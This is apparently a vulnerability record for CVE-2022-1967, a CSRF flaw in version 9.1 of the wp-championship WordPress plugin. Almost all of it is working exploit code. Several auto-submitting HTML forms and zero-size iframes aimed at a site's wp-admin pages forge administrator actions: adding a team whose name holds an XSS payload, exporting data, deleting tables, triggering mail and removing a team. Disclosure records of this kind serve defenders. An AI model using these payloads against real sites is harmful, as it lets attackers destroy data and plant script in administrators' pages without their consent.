CVE: CVE-2022-1967

Name: wp-championship (wp-championship)

Version: 9.1

Date: 2022-04-22 21:28:05

Advisory: https://wpscan.com/vulnerability/02d25736-c796-49bd-b774-66e0e3fcf4c9

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin_team.php#" method="POST">
    <input type="text" name="action" value="addteam">
    <input type="text" name="team_name" value="<img src=x onerror=alert(1)>">
    <input type="text" name="team_shortname" value="test">
    <input type="text" name="team_icon" value="b">
    <input type="text" name="group" value="A">
    <input type="text" name="qualified" value="0">
    <input type="text" name="penalty" value="0">
    <input type="hidden" id="submit" name="submit" value="Mannschaft hinzufügen »">
</form>
<script>
HTMLFormElement.prototype.submit.call(
    document.forms[0]
);
</script>


<iframe src="https://example.com/wp-admin/admin-ajax.php?action=wpc_export&dlmode=true&exmode=team&fnmode=false" width="0" height="0" frameborder="0"></iframe>


<form action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin.php#" method="POST">
    <input type="text" name="action" value="update">
    <input type="text" name="cs_groups" value="8">
    <input type="text" name="cs_pts_winner" value="3">
    <input type="text" name="cs_pts_looser" value="0">
    <input type="text" name="cs_pts_deuce" value="1">
    <input type="text" name="cs_group_teams" value="2">
    <input type="text" name="deltables_ok" value="1">
    <input type="text" name="deltables" value="Tabellen entfernen »">
    <input type="text" name="cs_pts_tipp" value="1">
    <input type="text" name="cs_pts_tendency" value="1">
    <input type="text" name="cs_stellv_schalter" value="1">
    <input type="text" name="cs_pts_supertipp" value="5">
    <input type="text" name="cs_modus" value="1">
    <input type="text" name="cs_pts_champ" value="1">
    <input type="text" name="cs_oneside_tendency" value="0">
    <input type="text" name="cs_pts_oneside" value="0">
    <input type="text" name="cs_reminder_hours" value="">
    <input type="text" name="cs_goalsum" value="-1">
    <input type="text" name="cs_rank_trend" value="1">
    <input type="text" name="cs_final_winner" value="-1">
    <input type="text" name="cs_pts_goalsum" value="0">
    <input type="text" name="cs_floating_link" value="1">
    <input type="text" name="cs_joker_idlist" value="">
    <input type="text" name="cs_joker_player" value="">
    <input type="text" name="cs_number_of_tippdays" value="">
    <input type="text" name="cs_xmlrpc_news" value=" ">
</form>
<script>
    document.forms[0].submit();
</script>


<form action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin.php#" method="POST">
    <input type="text" name="action" value="update">
    <input type="text" name="cs_groups" value="8">
    <input type="text" name="cs_pts_winner" value="3">
    <input type="text" name="mailservice_ok" value="1">
    <input type="text" name="mailservice1" value="Mailservice auslösen »">
    <input type="text" name="cs_pts_looser" value="0">
    <input type="text" name="cs_pts_deuce" value="1">
    <input type="text" name="cs_group_teams" value="2">
    <input type="text" name="cs_pts_tipp" value="1">
    <input type="text" name="cs_pts_tendency" value="1">
    <input type="text" name="cs_stellv_schalter" value="1">
    <input type="text" name="cs_pts_supertipp" value="5">
    <input type="text" name="cs_modus" value="1">
    <input type="text" name="cs_pts_champ" value="1">
    <input type="text" name="cs_oneside_tendency" value="0">
    <input type="text" name="cs_pts_oneside" value="0">
    <input type="text" name="cs_reminder_hours" value="">
    <input type="text" name="cs_goalsum" value="-1">
    <input type="text" name="cs_rank_trend" value="1">
    <input type="text" name="cs_final_winner" value="-1">
    <input type="text" name="cs_pts_goalsum" value="0">
    <input type="text" name="cs_floating_link" value="1">
    <input type="text" name="cs_joker_idlist" value="">
    <input type="text" name="cs_joker_player" value="">
    <input type="text" name="cs_number_of_tippdays" value="">
    <input type="text" name="cs_xmlrpc_news" value=" ">
</form>
<script>
    document.forms[0].submit();
</script>


<iframe src="https://example.com/wp-admin/admin.php?page=wp-championship/cs_admin_team.php&action=remove&tid=1" width="0" height="0" frameborder="0"></iframe>